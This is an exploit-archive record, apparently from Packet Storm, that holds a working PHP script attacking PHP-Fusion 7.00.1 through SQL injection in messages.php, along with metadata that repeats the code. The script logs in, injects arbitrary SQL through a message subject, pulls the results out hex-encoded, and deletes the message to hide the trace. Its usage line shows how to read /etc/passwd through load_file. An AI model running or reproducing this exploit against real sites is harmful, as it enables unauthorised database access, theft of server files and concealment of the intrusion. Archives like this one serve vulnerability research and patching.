ID PACKETSTORM:72136
Type packetstorm
Reporter irk4z
Modified 2008-11-20T00:00:00
Description
`<?php
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
requires magic_quotes == off
coded by irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com
greets: all friends ;)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/
$host = $argv[1];
$path = $argv[2];
$login = $argv[3];
$pass = $argv[4];
$sql_injection = $argv[5];
echo
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
" requires magic_quotes == off\n".
"\n".
" coded by irk4z[at]yahoo.pl\n".
" homepage: http://irk4z.wordpress.com\n".
"\n".
" greets: all friends ;)\n".
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";
if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
" php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
" php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
die;
}
echo "Logging into system...";
//login to php-fusion using login and pass
$login_data = send($host, array( "path" => $path."news.php",
"post" => array(
"user_name" => $login,
"user_pass" => $pass,
"login" => "Login"
)
)
);
//get cookies
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
$cookies = implode(' ', $matches[1]);
//get user id
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
$my_id = $matches[1][0];
if(empty($my_id)){
echo "\n[x] Incorrect login or password..";
die;
} else {
echo "[ok]\n";
}
$id_message = uniqid();
$inhex = '';
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;
echo "Running sql-injection...\n";
//running sql-injection
$res = send($host, array( "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
"cookie" => $cookies,
"post" => array(
"send_message" => 'X',
"subject" => "X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
"message" => "XXX"
)
)
);
echo "Getting data...\n\n";
$res = send($host, array( "path" => $path."messages.php?folder=outbox",
"cookie" => $cookies )
);
preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
$id_message_number = $matches[1][0];
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
"cookie" => $cookies )
);
preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);
if( empty($matches[1][0]) ){
echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
} else {
$tmp = '';
$hex = $matches[1][0];
//unhex it!
for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
echo "DATA: \n".$tmp."\n\n";
}
echo "Deleting message...\n";
$res = send($host, array( "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
"cookie" => $cookies,
"post" => array (
"delete" => "Delete"
)
)
);
//send http packet
function send($host, $dane = "") {
$packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
$packet .= "Host: {$host}\r\n";
if( !empty($dane['cookie']) ){
$packet .= "Cookie: {$dane['cookie']}\r\n";
}
if( !empty($dane['post']) ){
$reszta_syfu = "";
foreach($dane['post'] as $tmp => $tmp2){
$reszta_syfu .= $tmp . "=" . $tmp2 . "&";
}
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: Close\r\n";
$packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
$packet .= $reszta_syfu;
} else {
$packet .= "Connection: Close\r\n\r\n";
}
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}
fputs($o, $packet);
while (!feof($o)) $ret .= fread($o, 1024);
fclose($o);
return ($ret);
}
?>
`
{"type": "packetstorm", "published": "2008-11-20T00:00:00", "reporter": "irk4z", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9edbaf9475d854f29c67ffdfc51f64b1"}, {"key": "modified", "hash": "691831662812bae79d8a9dbf1bc8c882"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "691831662812bae79d8a9dbf1bc8c882"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "ee2ff22650d16e4ae5e8b218164584d2"}, {"key": "sourceData", "hash": "dc97deb8e4fa4aad61c0590efda649fe"}, {"key": "sourceHref", "hash": "5b2154546a75d8d092fab1f74d0d1e1e"}, {"key": "title", "hash": "bb95a9c261572e8226cfd34658019865"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`<?php \n/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* \nPHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit \nrequires magic_quotes == off \n \ncoded by irk4z[at]yahoo.pl \nhomepage: http://irk4z.wordpress.com \n \ngreets: all friends ;) \n*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/ \n \n$host = $argv[1]; \n$path = $argv[2]; \n$login = $argv[3]; \n$pass = $argv[4]; \n$sql_injection = $argv[5]; \n \necho \n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\". \n\" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\\n\". \n\" requires magic_quotes == off\\n\". \n\"\\n\". \n\" coded by irk4z[at]yahoo.pl\\n\". \n\" homepage: http://irk4z.wordpress.com\\n\". \n\"\\n\". \n\" greets: all friends ;)\\n\". \n\"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\\n\"; \n \nif(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){ \necho \"Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\\n\" . \n\" php $argv[0] localhost /php-fusion/ user s3cret \\\"SELECT database()\\\"\\n\". \n\" php $argv[0] localhost / user s3cret \\\"SELECT load_file(0x2F6574632F706173737764)\\\"\\n\\n\"; \ndie; \n} \n \necho \"Logging into system...\"; \n//login to php-fusion using login and pass \n$login_data = send($host, array( \"path\" => $path.\"news.php\", \n\"post\" => array( \n\"user_name\" => $login, \n\"user_pass\" => $pass, \n\"login\" => \"Login\" \n) \n) \n); \n \n//get cookies \npreg_match_all(\"/Set-Cookie:[\\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\\.]+;)/\", $login_data, $matches); \n$cookies = implode(' ', $matches[1]); \n \n//get user id \npreg_match_all(\"/([0-9])+.([a-zA-Z0-9]{32})/\", $cookies, $matches); \n$my_id = $matches[1][0]; \n \nif(empty($my_id)){ \necho \"\\n[x] Incorrect login or password..\"; \ndie; \n} else { \necho \"[ok]\\n\"; \n} \n \n$id_message = uniqid(); \n$inhex = ''; \nfor($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ; \n \necho \"Running sql-injection...\\n\"; \n//running sql-injection \n$res = send($host, array( \"path\" => $path.\"messages.php?msg_send={$my_id}%27%2F%2Axxx&\", \n\"cookie\" => $cookies, \n\"post\" => array( \n\"send_message\" => 'X', \n\"subject\" => \"X*/,0x{$inhex}, (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*\", \n\"message\" => \"XXX\" \n) \n) \n); \n \necho \"Getting data...\\n\\n\"; \n$res = send($host, array( \"path\" => $path.\"messages.php?folder=outbox\", \n\"cookie\" => $cookies ) \n); \n \npreg_match_all(\"/msg_read=([0-9]+)'>{$id_message}<\\/a>/\", $res, $matches); \n$id_message_number = $matches[1][0]; \n \n$res = send($host, array( \"path\" => $path.\"messages.php?folder=outbox&msg_read=\".$id_message_number, \n\"cookie\" => $cookies ) \n); \n \npreg_match_all(\"/{$id_message}{$id_message}(.*){$id_message}{$id_message}/\", $res, $matches); \n \nif( empty($matches[1][0]) ){ \necho \"[x] Failed... maybe SQL-INJ is incorrect?\\n\\n\"; \n} else { \n$tmp = ''; \n$hex = $matches[1][0]; \n//unhex it! \nfor($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1])); \necho \"DATA: \\n\".$tmp.\"\\n\\n\"; \n} \n \necho \"Deleting message...\\n\"; \n \n$res = send($host, array( \"path\" => $path.\"messages.php?folder=outbox&msg_id=\".$id_message_number, \n\"cookie\" => $cookies, \n\"post\" => array ( \n\"delete\" => \"Delete\" \n) \n) \n); \n \n//send http packet \nfunction send($host, $dane = \"\") { \n$packet = (empty($dane['post']) ? \"GET\" : \"POST\") . \" {$dane[\"path\"]} HTTP/1.1\\r\\n\"; \n$packet .= \"Host: {$host}\\r\\n\"; \n \nif( !empty($dane['cookie']) ){ \n$packet .= \"Cookie: {$dane['cookie']}\\r\\n\"; \n} \n \nif( !empty($dane['post']) ){ \n$reszta_syfu = \"\"; \nforeach($dane['post'] as $tmp => $tmp2){ \n$reszta_syfu .= $tmp . \"=\" . $tmp2 . \"&\"; \n} \n$packet .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\"; \n$packet .= \"Connection: Close\\r\\n\"; \n$packet .= \"Content-Length: \".strlen($reszta_syfu).\"\\r\\n\\r\\n\"; \n$packet .= $reszta_syfu; \n} else { \n$packet .= \"Connection: Close\\r\\n\\r\\n\"; \n} \n \n$o = @fsockopen($host, 80); \nif(!$o){ \necho \"\\n[x] No response...\\n\"; \ndie; \n} \nfputs($o, $packet); \nwhile (!feof($o)) $ret .= fread($o, 1024); \nfclose($o); \nreturn ($ret); \n} \n \n?> \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:29:02", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/72136/phpfusion7001-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/72136/phpfusion7001-sql.txt", "title": "phpfusion7001-sql.txt", "enchantments": {"score": {"value": -0.3, "vector": "NONE", "modified": "2016-11-03T10:29:02"}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:02"}, "vulnersScore": -0.3}, "references": [], "id": "PACKETSTORM:72136", "hash": "1f6a19b7e643994d04bfe17152b6ae3667718f288417f763f98b59d6254eabe2", "edition": 1, "cvelist": [], "modified": "2008-11-20T00:00:00", "description": ""}
{}
